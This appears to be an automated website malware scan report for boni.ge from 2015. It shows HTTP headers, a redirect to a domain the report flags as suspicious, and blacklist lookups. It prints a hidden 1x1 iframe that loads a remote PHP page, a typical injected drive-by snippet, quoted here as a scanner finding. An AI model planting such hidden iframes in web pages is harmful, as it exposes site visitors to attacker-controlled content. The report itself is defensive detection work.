Scanned pages/files
Request | Server response | Status |
http://boni.ge/ | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 22 Sep 2015 21:37:01 GMT Pragma: no-cache Location: http://unisoo.info/?b Server: Apache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=96bf5d6ff8c17e10db84ce3ed88dae0a; path=/; domain=.boni.ge; HttpOnly Set-Cookie: dle_user_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.boni.ge; httponly Set-Cookie: dle_password=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.boni.ge; httponly Set-Cookie: dle_hash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.boni.ge; httponly X-Powered-By: PHP/5.3.29 | clean |
http://unisoo.info/?b | 200 OK Content-Length: 2601 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://arqivi.net/lead.php <iframe frameborder="0" marginheight="0" marginwidth="0" scrolling="no" src="http://arqivi.net/lead.php" width="1" height="1"> | ||
http://unisoo.info/popup/javascripts/prototype.js | 200 OK Content-Length: 99217 Content-Type: application/javascript | clean |
http://boni.ge/popup/javascripts/effects.js | 404 Not Found Content-Length: 491 Content-Type: text/html | clean |
http://boni.ge/test404page.js | 404 Not Found Content-Length: 477 Content-Type: text/html | clean |
http://boni.ge/popup/javascripts/window.js | 404 Not Found Content-Length: 490 Content-Type: text/html | clean |
http://boni.ge/popup/javascripts/debug.js | 404 Not Found Content-Length: 489 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: boni.ge
Result:
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 22 Sep 2015 21:37:01 GMT
Pragma: no-cache
Location: http://unisoo.info/?b
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=96bf5d6ff8c17e10db84ce3ed88dae0a; path=/; domain=.boni.ge; HttpOnly
Set-Cookie: dle_user_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.boni.ge; httponly
Set-Cookie: dle_password=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.boni.ge; httponly
Set-Cookie: dle_hash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.boni.ge; httponly
X-Powered-By: PHP/5.3.29
GET / HTTP/1.1
Host: boni.ge
Result:
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 22 Sep 2015 21:37:01 GMT
Pragma: no-cache
Location: http://unisoo.info/?b
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=96bf5d6ff8c17e10db84ce3ed88dae0a; path=/; domain=.boni.ge; HttpOnly
Set-Cookie: dle_user_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.boni.ge; httponly
Set-Cookie: dle_password=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.boni.ge; httponly
Set-Cookie: dle_hash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.boni.ge; httponly
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: boni.ge
Referer: http://www.google.com/search?q=boni.ge
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: boni.ge
Referer: http://www.google.com/search?q=boni.ge
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=boni.ge
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://boni.ge/
Result: boni.ge is not infected or malware details are not published yet.
Result: boni.ge is not infected or malware details are not published yet.